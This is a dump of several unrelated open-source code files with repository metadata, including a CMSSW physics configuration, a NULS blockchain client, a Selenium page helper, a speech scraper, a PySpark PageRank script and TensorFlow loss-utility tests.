a[l:m]+_switch(ch[2])+
a[m:n]+_switch(ch[3])+a[n:])+
'(w{} - w{})'.format(
b[:k]+ch[0]+b[k:l]+ch[1]+b[l:m]+ch[2]+b[m:n]+ch[3]+b[n:],
b[:k]+_switch(ch[0])+
b[k:l]+_switch(ch[1])+
b[l:m]+_switch(ch[2])+
b[m:n]+_switch(ch[3])+b[n:]))
)
return poly_list
| [
"devin@greene.cz"
] | devin@greene.cz |
6a3623bd08a74a8f907ecbdfc4368e677f98e843 | 9d0195aa83cc594a8c61f334b90375961e62d4fe | /JTTest/SL7/CMSSW_10_2_15/src/dataRunA/nano1433.py | a2fb809bcd5cf445b8aa9aa55ee1a7513b1de66e | [] | no_license | rsk146/CMS | 4e49592fc64f6438051544c5de18598db36ed985 | 5f8dab8c59ae556598b9747b52b88205fffc4dbe | refs/heads/master | 2022-12-01T03:57:12.126113 | 2020-08-04T03:29:27 | 2020-08-04T03:29:27 | 284,863,383 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,293 | py | # Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: nanoAOD_jetToolbox_cff -s NANO --data --eventcontent NANOAOD --datatier NANOAOD --no_exec --conditions 102X_dataRun2_Sep2018Rereco_v1 --era Run2_2018,run2_nanoAOD_102Xv1 --customise_commands=process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False))) --customise JMEAnalysis/JetToolbox/nanoAOD_jetToolbox_cff.nanoJTB_customizeMC --filein /users/h2/rsk146/JTTest/SL7/CMSSW_10_6_12/src/ttbarCutTest/dataReprocessing/0004A5E9-9F18-6B42-B31D-4206406CE423.root --fileout file:jetToolbox_nano_datatest.root
import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('NANO',eras.Run2_2018,eras.run2_nanoAOD_102Xv1)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('PhysicsTools.NanoAOD.nano_cff')
process.load('Configuration.StandardSequences.EndOfProcess_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:root://cms-xrd-global.cern.ch//store/data/Run2018A/EGamma/MINIAOD/17Sep2018-v2/120000/AFA857F6-C77B-314D-B472-A50BFA0A7BAC.root'),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('nanoAOD_jetToolbox_cff nevts:1'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
# Output definition
process.NANOAODoutput = cms.OutputModule("NanoAODOutputModule",
compressionAlgorithm = cms.untracked.string('LZMA'),
compressionLevel = cms.untracked.int32(9),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('NANOAOD'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:jetToolbox_nano_datatest1433.root'),
outputCommands = process.NANOAODEventContent.outputCommands
)
# Additional output definition
# Other statements
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '102X_dataRun2_Sep2018Rereco_v1', '')
# Path and EndPath definitions
process.nanoAOD_step = cms.Path(process.nanoSequence)
process.endjob_step = cms.EndPath(process.endOfProcess)
process.NANOAODoutput_step = cms.EndPath(process.NANOAODoutput)
# Schedule definition
process.schedule = cms.Schedule(process.nanoAOD_step,process.endjob_step,process.NANOAODoutput_step)
from PhysicsTools.PatAlgos.tools.helpers import associatePatAlgosToolsTask
associatePatAlgosToolsTask(process)
# customisation of the process.
# Automatic addition of the customisation function from PhysicsTools.NanoAOD.nano_cff
from PhysicsTools.NanoAOD.nano_cff import nanoAOD_customizeData
#call to customisation function nanoAOD_customizeData imported from PhysicsTools.NanoAOD.nano_cff
process = nanoAOD_customizeData(process)
# Automatic addition of the customisation function from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff import nanoJTB_customizeMC
#call to customisation function nanoJTB_customizeMC imported from JMEAnalysis.JetToolbox.nanoAOD_jetToolbox_cff
process = nanoJTB_customizeMC(process)
# End of customisation functions
# Customisation from command line
process.add_(cms.Service('InitRootHandlers', EnableIMT = cms.untracked.bool(False)))
# Add early deletion of temporary data products to reduce peak memory need
from Configuration.StandardSequences.earlyDeleteSettings_cff import customiseEarlyDelete
process = customiseEarlyDelete(process)
# End adding early deletion | [
"rsk146@scarletmail.rutgers.edu"
] | rsk146@scarletmail.rutgers.edu |
0715fd0b7eb50cb61eb5b8b45cab73ceb41c0401 | f4534e1f23add4255a810688cc2d1c6c10a4c9b3 | /ch07/ex7-1.py | 39a55a8d82466def138a5764f39a4b20b086866d | [
"MIT"
] | permissive | jasonhuayen91/Introduction_to_Computing_and_Programming_Using_Python | 610ee2c060dd45d04652fb823f29a88c6bca1c45 | 9f211e66f8711b6c35405a1f40f14fcf9637294a | refs/heads/master | 2021-05-29T23:21:40.326647 | 2015-03-03T16:41:54 | 2015-03-03T16:41:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | def sumDigit(s):
"""sを文字列とする.
sの中の数字の合計を返す.
例えば, sが'a2b3c'ならば5を返す"""
ret = 0
for d in s:
try:
ret += int(d)
except ValueError:
pass
return ret
print(sumDigit('a2b3c') == 5)
| [
"premier3next@yahoo.co.jp"
] | premier3next@yahoo.co.jp |
f14bd6aa41aa3ad7ff7125f37ea0a33130409c19 | 9e81f89418be3dbae1be1080ed807ec69b934af6 | /nulspy/nuls.py | 9bc41b7221117c20474c49e2c1593b8406bb9167 | [
"MIT"
] | permissive | xiangxn/nulspy | 373062ffd3a8fcda1e68e724082db137b39c769b | df2323bcb6fb76b16e236a5c2331a1a74ee99908 | refs/heads/master | 2021-02-18T13:15:19.957348 | 2020-12-02T14:44:43 | 2020-12-02T14:44:43 | 245,199,515 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,867 | py | from .api.rpc_api import RpcAPI
from coincurve import PrivateKey, PublicKey
from .transaction import Transaction
from .address import Address
from .define import Define
import nulspy.trxs.contract
import time
import math
class NULS:
    def __init__(self, api_url, private_key, chain_id=2):
        """Create a NULS client bound to one RPC endpoint and one signing key.

        Args:
            api_url: Base URL of the NULS JSON-RPC service.
            private_key: Either 32 raw bytes, or a 64-character hex string.
            chain_id: NULS chain identifier (default 2).
        """
        self.api_url = api_url
        self.chain_id = chain_id
        self.api = RpcAPI(self.api_url, self.chain_id)
        if isinstance(private_key, bytes) and len(private_key) == 32:
            # Already raw key material; store as-is.
            self.private_key = private_key
        else:
            # Otherwise expect hex: 64 hex chars decode to 32 bytes.
            assert len(private_key) == 64, "Invalid private key"
            self.private_key = bytes.fromhex(private_key)
async def countFee(self, tx, signatrueCount):
data = await tx.serialize()
txSize = len(data)
txSize = txSize + signatrueCount * 110
return 100000 * math.ceil(txSize / 1024)
def twoDimensionalArray(self, args, argsType):
if not args or len(args) == 0:
return None
elif len(args) != len(argsType):
raise ValueError("args number error")
else:
two = []
for i in range(len(args)):
arg = args[i]
if not arg:
two.append([])
continue
if isinstance(arg, str):
if argsType and not arg and not isinstance(argsType[i], str):
two.append([])
elif not argsType and arg and "[]" in argsType[i]:
arrArg = eval(arg)
if isinstance(arrArg, list):
ma = []
for k in range(len(arrArg)):
ma.append(str(arrArg[k]))
two.append(ma)
else:
raise ValueError("args number error")
else:
two.append([arg])
elif isinstance(arg, list):
mb = []
for n in range(len(arg)):
mb.append(str(arg[n]))
two.append(mb)
else:
two.append([str(arg)])
return two
    async def transfer(self, from_addr, to_addr, amount, memo="", asset_id=1, asset_chain_id=2):
        """Send *amount* of an asset from *from_addr* to *to_addr*.

        Builds a type-2 transfer transaction, signs it with this
        client's private key and broadcasts it through the RPC API.

        Args:
            from_addr: Sender address (must correspond to ``self.private_key``).
            to_addr: Recipient address.
            amount: Amount in the asset's smallest unit.
            memo: Optional remark stored with the transaction.
            asset_id: Asset identifier (default 1, the chain's main asset).
            asset_chain_id: Chain the asset belongs to (default 2).

        Returns:
            The broadcast transaction hash, or None on failure.
        """
        nonce = ""
        # The account nonce comes from the current balance record.
        balance = await self.api.getBalance(from_addr, asset_chain=asset_chain_id, asset=asset_id)
        assert balance, "Failed to get balance"
        nonce = balance['nonce']
        outputs = [{"address": to_addr, "amount": amount, "lockTime": 0, "assetsChainId": asset_chain_id, "assetsId": asset_id}]
        tx = await Transaction.fromDict({
            "type": 2,
            "time": int(time.time()),
            "remark": memo.encode('utf-8'),
            "coinFroms": [{
                'address': from_addr,
                'assetsChainId': asset_chain_id,
                'assetsId': asset_id,
                'amount': 0,
                'nonce': nonce,
                'locked': 0
            }],
            "coinTos": outputs
        })
        # The input must cover the network fee plus every amount paid out.
        tx.inputs[0]['amount'] = ((await tx.calculateFee()) + sum([o['amount'] for o in outputs]))
        await tx.signTx(self.private_key)
        tx_hex = (await tx.serialize()).hex()
        result = await self.api.broadcast(tx_hex)
        if result and "hash" in result:
            return result['hash']
        else:
            return None
async def estimateContractCallGas(self, contractAddress, methodName, addr=None, value=0, args=[], methodDesc=None):
if not addr:
addr = Address.getAddress(PrivateKey(self.private_key).public_key.format(), chain_id=self.chain_id)
result = await self.api.estimateContractCallGas(addr, contractAddress, methodName, value=value, args=args, methodDesc=methodDesc)
if result and "gasLimit" in result:
return result['gasLimit']
return 1
async def invokeView(self, contractAddress, methodName, methodDesc=None, args=[]):
result = await self.api.invokeView(contractAddress, methodName, methodDesc, args, self.chain_id)
if result and "result" in result:
return result['result']
return None
async def callContract(self, fromAddress, contractCall, remark="", assetsChainId=1, assetsId=1, privateKey=None):
balanceInfo = await self.api.getBalance(fromAddress, asset_chain=self.chain_id)
gasLimit = await self.estimateContractCallGas(contractCall['contractAddress'],
contractCall['methodName'],
addr=fromAddress,
value=contractCall['value'],
args=contractCall['args'],
methodDesc=contractCall['methodDesc'])
argsType = await self.api.getContractMethodArgsTypes(contractCall['contractAddress'],
contractCall['methodName'],
contractCall['methodDesc'],
chainId=self.chain_id)
args = self.twoDimensionalArray(contractCall['args'], argsType)
data = {
'chainId': self.chain_id,
'sender': fromAddress,
'contractAddress': contractCall['contractAddress'],
'value': contractCall['value'],
'gasLimit': gasLimit,
'price': Define.CONTRACT_MINIMUM_PRICE,
'methodName': contractCall['methodName'],
'methodDesc': contractCall['methodDesc'],
'args': args if args else []
}
gasFee = gasLimit * data['price']
amount = data['value'] + gasFee
transferInfo = {'fromAddress': fromAddress, 'assetsChainId': assetsChainId, 'assetsId': assetsId, 'amount': amount, 'fee': 100000}
if contractCall['value'] > 0:
transferInfo['toAddress'] = contractCall['contractAddress']
transferInfo['value'] = contractCall['value']
inputs = [{
'address': transferInfo['fromAddress'],
'assetsChainId': transferInfo['assetsChainId'],
'assetsId': transferInfo['assetsId'],
'amount': transferInfo['amount'] + transferInfo['fee'],
'locked': 0,
'nonce': balanceInfo['nonce']
}]
if int(balanceInfo['balance']) < inputs[0]['amount']:
raise ValueError("Your balance is not enough.")
outputs = []
if "toAddress" in transferInfo and transferInfo['toAddress']:
outputs = [{
'address': transferInfo['toAddress'],
'assetsChainId': transferInfo['assetsChainId'],
'assetsId': transferInfo['assetsId'],
'amount': transferInfo['value'],
'lockTime': 0
}]
tx = await Transaction.fromDict({
"type": 16,
"time": int(time.time()),
"remark": remark.encode('utf-8'),
"coinFroms": inputs,
"coinTos": outputs,
'txData': data
})
newFee = await self.countFee(tx, 1)
if transferInfo['fee'] != newFee:
transferInfo['fee'] = newFee
inputs['amount'] = transferInfo['amount'] + transferInfo['fee']
tx = await Transaction.fromDict({
"type": 16,
"time": int(time.time()),
"remark": remark.encode('utf-8'),
"coinFroms": inputs,
"coinTos": outputs,
'txData': data
})
if not privateKey:
privateKey = self.private_key
await tx.signTx(privateKey)
tx_hex = (await tx.serialize()).hex()
result = await self.api.broadcast(tx_hex)
if result and "hash" in result:
return result['hash']
else:
return None
    async def contractCallOffline(self, contractAddress, methodName, sender=None, args=[], value=0, methodDesc=None, argsType=[], remark=None):
        """Have the node assemble an unsigned contract-call transaction.

        Unlike :meth:`callContract`, this neither signs nor broadcasts;
        the node returns the raw transaction hex so it can be signed
        elsewhere.

        Args:
            contractAddress: Target contract.
            methodName: Contract method to invoke.
            sender: Calling address; derived from this client's private
                key when omitted.
            args: Method arguments.
            value: NULS amount to attach to the call.
            methodDesc: Method signature used to disambiguate overloads.
            argsType: Declared types for ``args``.
            remark: Optional transaction remark.

        Returns:
            The node response containing ``txHex`` on success, else None.
        """
        if not sender:
            sender = Address.getAddress(PrivateKey(self.private_key).public_key.format(), chain_id=self.chain_id)
        balance = await self.api.getBalance(sender, asset_chain=self.chain_id)
        senderBalance = balance['balance']
        nonce = balance['nonce']
        # Let the node estimate the gas limit for this particular call.
        res = await self.api.estimateContractCallGas(sender, contractAddress, methodName, value=value, args=args, methodDesc=methodDesc)
        gasLimit = res['gasLimit']
        result = await self.api.contractCallOffline(sender,
                                                    senderBalance,
                                                    nonce,
                                                    contractAddress,
                                                    gasLimit,
                                                    methodName,
                                                    value=value,
                                                    methodDesc=methodDesc,
                                                    args=args,
                                                    argsType=argsType,
                                                    remark=remark,
                                                    chain_id=self.chain_id)
        if result and "txHex" in result:
            return result
        return None
async def getContractTxResult(self, trxHash, chainId=None) -> bool:
result = await self.api.getContractTxResult(trxHash, chainId=self.chain_id)
if result and "success" in result and result['success']:
return True
return False
| [
"xiangxn@163.com"
] | xiangxn@163.com |
ed692ad0f8875dd61c658bec4a1044361b1b034a | 53eb0a066fd73b6996b9c547536699865d499686 | /ElementApp/base.py | 23e1cddd867e0d32a2ee7be40e59e7433977ce86 | [] | no_license | zhangliwen1112/HoliEBR-UI | 862e2aeda7b2884df2aa586f4cf630b50b91a1af | c755c978d2c977f4962a3f4426e93524fd5a5d4f | refs/heads/master | 2023-05-07T02:12:54.662392 | 2021-05-26T08:47:36 | 2021-05-26T08:47:36 | 360,793,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | from selenium.webdriver.common.action_chains import ActionChains
class Page(object):
    """Thin convenience wrapper around a Selenium WebDriver.

    Groups the driver operations used by page objects behind short,
    uniformly named helper methods.
    """

    def __init__(self, driver):
        # Keep a reference to the underlying Selenium WebDriver.
        self.driver = driver

    def find_element(self, *loc):
        """Locate and return a single element for the given locator."""
        return self.driver.find_element(*loc)

    def find_elements(self, *loc):
        """Locate and return every element matching the given locator."""
        return self.driver.find_elements(*loc)

    def back(self):
        """Navigate one step back in the browser history."""
        return self.driver.back()

    def forward(self):
        """Navigate one step forward in the browser history."""
        return self.driver.forward()

    def f5(self):
        """Reload the current page (like pressing F5)."""
        return self.driver.refresh()

    def maxmize_window(self):
        """Maximize the browser window (method name kept for caller compatibility)."""
        return self.driver.maximize_window()

    def move_to_element(self, element):
        """Hover the mouse pointer over *element* via an action chain."""
        ActionChains(self.driver).move_to_element(element).perform()

    def clear_text(self, element):
        """Erase any text currently held by *element*."""
        element.clear()

    def click(self, element):
        """Send a click to *element*."""
        element.click()

    def input_text(self, element, value):
        """Type *value* into *element*."""
        element.send_keys(value)
| [
"411454954@qq.com"
] | 411454954@qq.com |
c7a6c28a2bd7b90845c3a1da592be76352b16c64 | 1da5c73824b84d7da15248c787fa9ec87276c862 | /bolsonaro_data/speeches_to_df.py | 5f91a17559c6dfcfc62c66bbaf2abf5376a5017b | [] | no_license | pbragamiranda/presidential-speeches-scraper | a6d8963e856d934131220ee5be17a26d6395df9f | 1bbf8c90ab72994aa398032b099b0788779f91ee | refs/heads/main | 2023-04-18T06:38:21.969808 | 2021-04-29T00:00:08 | 2021-04-29T00:00:08 | 358,831,123 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,170 | py | # import libraries
import csv
import uuid
import time
import os.path
import requests
from bs4 import BeautifulSoup
# create function to write to csv
def write_csv(filename):
unique_filename = uuid.uuid4().hex + '___' + filename
with open(f'csv_data/{unique_filename}', 'w', newline='') as file:
writer = csv.writer(file, delimiter='|')
# writer.writerows(headers)
writer.writerows(data)
print(f'{unique_filename} created')
# get list of url
speechs_url = []
with open('speechs_url.csv', 'r') as file:
reader = csv.reader(file)
for row in reader:
speechs_url.append(row)
# scraping each speech
for url in speechs_url[0]:
data = [['date', 'title', 'speech']]
print(f'sraping {url}')
url = url
page = requests.get(url)
soup = BeautifulSoup(page.content,"html.parser")
title = soup.find('h1', class_='documentFirstHeading').text
date = soup.find("span", class_="value").text
published = f'Publicado em {date}'
print(published)
speech = soup.find(id='parent-fieldname-text').text
filename = date[:10].replace("/", "") + ".csv"
data.append([date, title, speech])
write_csv(filename)
time.sleep(5)
| [
"pbragamiranda@gmail.com"
] | pbragamiranda@gmail.com |
d14f782b0de48917af7243ab5ea11b9cf46f61c0 | 794decce384b8e0ba625e421cc35681b16eba577 | /tensorflow/python/ops/nn_loss_scaling_utilities_test.py | a71c0cf5992d24f735c49f3c68f1f7b9a7e2d43c | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | 911gt3/tensorflow | a6728e86100a2d5328280cfefcfa8e7c8de24c4c | 423ea74f41d5f605933a9d9834fe2420989fe406 | refs/heads/master | 2023-04-09T14:27:29.072195 | 2023-04-03T06:20:23 | 2023-04-03T06:22:54 | 258,948,634 | 0 | 0 | Apache-2.0 | 2020-04-26T05:36:59 | 2020-04-26T05:36:58 | null | UTF-8 | Python | false | false | 8,517 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for loss scaling utilities in tensorflow.ops.nn."""
from absl.testing import parameterized
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import strategy_combinations
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.platform import test as test_lib
class LossUtilitiesTest(test_lib.TestCase, parameterized.TestCase):
def testComputeAverageLossGlobalBatchSize(self):
per_example_loss = [1, 2, 3, 4, 5]
loss = nn_impl.compute_average_loss(per_example_loss, global_batch_size=10)
self.assertEqual(self.evaluate(loss), 1.5)
def testComputeAverageLossGlobalBatchSize_BatchSizeNonScalar(self):
per_example_loss = [1, 2, 3, 4, 5]
with self.assertRaisesWithPredicateMatch(
ValueError, "global_batch_size must be scalar"):
nn_impl.compute_average_loss(per_example_loss, global_batch_size=[10])
def testComputeAverageLossGlobalBatchSize_BatchSizeFloat(self):
per_example_loss = [1, 2, 3, 4, 5]
with self.assertRaisesWithPredicateMatch(
TypeError, "global_batch_size must be an int"):
nn_impl.compute_average_loss(per_example_loss, global_batch_size=10.0)
def testComputeAverageLossGlobalBatchSize_BatchSizeNegative(self):
per_example_loss = [1, 2, 3, 4, 5]
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError, "global_batch_size must be positive"):
nn_impl.compute_average_loss(per_example_loss, global_batch_size=-1)
def testComputeAverageLossGlobalBatchSize_BatchSizeZero(self):
per_example_loss = [1, 2, 3, 4, 5]
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError, "global_batch_size must be positive"):
nn_impl.compute_average_loss(per_example_loss, global_batch_size=0)
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testComputeAverageLossDefaultGlobalBatchSize(self, distribution):
# Without strategy - num replicas = 1
per_example_loss = constant_op.constant([2.5, 6.2, 5.])
loss = nn_impl.compute_average_loss(per_example_loss)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.) / 3)
# With strategy - num replicas = 2
with distribution.scope():
per_replica_losses = distribution.run(
nn_impl.compute_average_loss, args=(per_example_loss,))
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.) / 3)
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testComputeAverageLossSampleWeights(self, distribution):
with distribution.scope():
# Scalar sample weight
per_replica_losses = distribution.run(
nn_impl.compute_average_loss,
args=([2., 4., 6.],),
kwargs={"sample_weight": 2})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2. + 4. + 6.) * 2. / 3)
# Per example sample weight
per_replica_losses = distribution.run(
nn_impl.compute_average_loss,
args=([2., 4., 6.],),
kwargs={"sample_weight": [0.3, 0.5, 0.2]})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(
self.evaluate(loss), (2. * 0.3 + 4. * 0.5 + 6. * 0.2) / 3)
# Time-step sample weight
per_replica_losses = distribution.run(
nn_impl.compute_average_loss,
args=([[2., 0.5], [4., 1.]],),
kwargs={"sample_weight": [[0.3, 0.7], [0.2, 0.8]]})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(
self.evaluate(loss), (2. * 0.3 + 0.5 * 0.7 + 4. * 0.2 + 1. * 0.8) / 2)
def testComputeAverageLossInvalidSampleWeights(self):
with self.assertRaisesIncompatibleShapesError(
(ValueError, errors_impl.InvalidArgumentError)):
nn_impl.compute_average_loss([2.5, 6.2, 5.],
sample_weight=[0.2, 0.8],
global_batch_size=10)
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testComputeAverageLossDtype(self, distribution):
with distribution.scope():
per_example_loss = constant_op.constant([2., 4., 6.],
dtype=dtypes.float64)
per_replica_losses = distribution.run(
nn_impl.compute_average_loss,
args=(per_example_loss,),
kwargs={"sample_weight": 2})
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertEqual(loss.dtype, dtypes.float64)
def testComputeAverageLossInvalidRank(self):
per_example_loss = constant_op.constant(2)
# Static rank
with self.assertRaisesRegex(
ValueError, "Invalid value passed for `per_example_loss`. "
"Expected a tensor with at least rank 1."):
nn_impl.compute_average_loss(per_example_loss)
with context.graph_mode():
# Dynamic rank
per_example_loss = array_ops.placeholder(dtype=dtypes.float32)
loss = nn_impl.compute_average_loss(per_example_loss)
with self.cached_session() as sess:
with self.assertRaisesRegex(
errors.InvalidArgumentError,
"Invalid value passed for `per_example_loss`. "
"Expected a tensor with at least rank 1."):
sess.run(loss, {per_example_loss: 2})
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testComputeAverageLossInCrossReplicaContext(self, distribution):
with distribution.scope():
with self.assertRaisesRegex(
RuntimeError,
"You are calling `compute_average_loss` in cross replica context"):
nn_impl.compute_average_loss([2, 3])
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testScaleRegularizationLoss(self, distribution):
# Without strategy - num replicas = 1
reg_losses = constant_op.constant([2.5, 6.2, 5.])
loss = nn_impl.scale_regularization_loss(reg_losses)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.))
# With strategy - num replicas = 2
with distribution.scope():
per_replica_losses = distribution.run(
nn_impl.scale_regularization_loss, args=(reg_losses,))
loss = distribution.reduce("SUM", per_replica_losses, axis=None)
self.assertAllClose(self.evaluate(loss), (2.5 + 6.2 + 5.))
@combinations.generate(
combinations.combine(
distribution=[strategy_combinations.mirrored_strategy_with_two_cpus],
mode=["graph", "eager"],
)
)
def testScaleRegularizationLossInCrossReplicaContext(self, distribution):
with distribution.scope():
with self.assertRaisesRegex(
RuntimeError, "You are calling `scale_regularization_loss` in "
"cross replica context"):
nn_impl.scale_regularization_loss([2, 3])
if __name__ == "__main__":
test_lib.main()
| [
"gardener@tensorflow.org"
] | gardener@tensorflow.org |
4c8257be407ae5d6604039ed1d3ef77cf90b98a1 | 7fd39373c9f53a92b406e18f59ac1b831e6399a2 | /accounts/migrations/0002_lover.py | c08b49659abd1c486470e1e52ad6a098bc677b56 | [] | no_license | aahmedsamy/l-backend | 5809cdf7af879458aef2c7a257861fd2f15fefca | 751c0a5121b6271a4c5f658b661680737e036054 | refs/heads/master | 2022-09-30T12:37:13.601137 | 2020-06-05T09:11:55 | 2020-06-05T09:11:55 | 212,978,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | # Generated by Django 2.2.6 on 2019-10-08 22:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Lover',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('female', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='female_user', to=settings.AUTH_USER_MODEL, unique=True)),
('male', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='male_user', to=settings.AUTH_USER_MODEL, unique=True)),
],
),
]
| [
"aahmedsamy.as@gmail.com"
] | aahmedsamy.as@gmail.com |
e1341887af6e4a64307c55e2244b898adc56e6ab | 4cfbf85d5e14469a3f921a991f98782d1f28b2a7 | /pyspark/pagerank.py | d7ce1e903c99e891b6e115f90e92482ed4ffea9b | [] | no_license | jdepreter/ir-pagerank | cb7344a9bf0c92517f86015c32d4d1906214f76e | 24a957be358e5dd37de9e2b24868940732c930fa | refs/heads/master | 2023-01-31T03:39:39.449783 | 2020-12-14T11:21:59 | 2020-12-14T11:21:59 | 314,180,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,763 | py | import pprint
import findspark
findspark.init()
import pyspark
from pyspark import SparkContext, SparkConf, SQLContext
from pyspark.sql import SparkSession
# --- PageRank over the ClueWeb09 web graph using plain PySpark RDDs ---
inputfile = "../data/ClueWeb09_WG_50m_numbered.graph-txt"
alpha = float(0.15) # Teleportation probability
epsilon = 0.000001 # 10^-6
outputdir = "big0.15.csv"
# Local Spark run: 3 cores, 8 GB for both executor and driver.
config = pyspark.SparkConf().setAll([('spark.executor.memory', '8g'), ('spark.executor.cores', '3'), ('spark.cores.max', '3'), ('spark.driver.memory','8g')]) \
    .setAppName('appName').setMaster('local[*]')
sc = pyspark.SparkContext(conf=config)
spark = SparkSession(sc)
# Total node count; used for the uniform initial rank and the
# teleportation term.  NOTE(review): hard-coded — confirm it matches the
# input graph file.
am_nodes = 428136613
# Adjacency list
# Each input line is "<source>.<dst1> <dst2> ..."; an empty part after
# the dot means the node has no out-links.
links = sc.textFile(inputfile)
links = links.map(lambda node: (node.split(".")[0], (node.split(".")[1].split(' ') if node.split(".")[1] != '' else []))) # [ (source, [destinations]), ... ]
links = links.filter(lambda node: node[0] != '-1')
# Every node starts with rank 1/N.
ranks = links.map(lambda node: (node[0], 1.0 / am_nodes))
# Constant teleportation contribution of alpha/N per node.
base_ranks = links.map(lambda x: (x[0], alpha / am_nodes))
iteration = 0
error = 1
# Power iteration until the largest per-node rank change drops below epsilon.
while error > epsilon:
    # Spread each node's rank evenly across its out-links, damped by (1 - alpha).
    new_ranks = links.join(ranks).flatMap(lambda x : [(i, (1-alpha) * float(x[1][1])/len(x[1][0])) for i in x[1][0]])
    # print(new_ranks.take(10))
    # Add the teleportation term, then sum all contributions per node.
    new_ranks = sc.union([new_ranks, base_ranks])
    # print(new_ranks.take(10))
    new_ranks = new_ranks.reduceByKey(lambda x,y: x+y)
    # Largest absolute per-node difference between successive rank vectors.
    error_rdd = new_ranks.union(ranks).reduceByKey(lambda x, y: abs(x-y)).map(lambda x: x[1])
    # print(error_rdd.take(10))
    error = error_rdd.reduce(max)
    # print(error)
    ranks = new_ranks
    print(f"Iteration {iteration} with error {error}")
    iteration += 1
    # NOTE(review): this break stops after a single iteration, so the
    # epsilon convergence test above never takes effect — looks like
    # leftover debugging; confirm before relying on the output ranks.
    break
ranks = ranks.sortBy(lambda node: -node[1])
print(ranks.take(10))
df = ranks.toDF()
df.repartition(1).write.csv(outputdir)
"jolan.depreter@gmail.com"
] | jolan.depreter@gmail.com |
3dd6b2986f6fd886dd1179e7b456bb349f201ad3 | e9156143e706fa7981f531dafb4fec72f42d9d78 | /snapflow_bi/functions/transaction_ltv_model/tests/test_transaction_ltv_model.py | 637af7409b431737d5b34b8640b2f23d389eff06 | [
"BSD-3-Clause"
] | permissive | kvh/snapflow-bi | b5a00b4c8902e663b400e4831da53ce7d1888a21 | 2e0877b19fb0738ba384b798ad1c5c33c4b3111e | refs/heads/master | 2023-06-07T20:27:16.467895 | 2021-06-18T15:17:20 | 2021-06-18T15:17:20 | 308,482,793 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,809 | py | inputs = {
"transactions": dict(
data="""
customer_id,transacted_at,amount
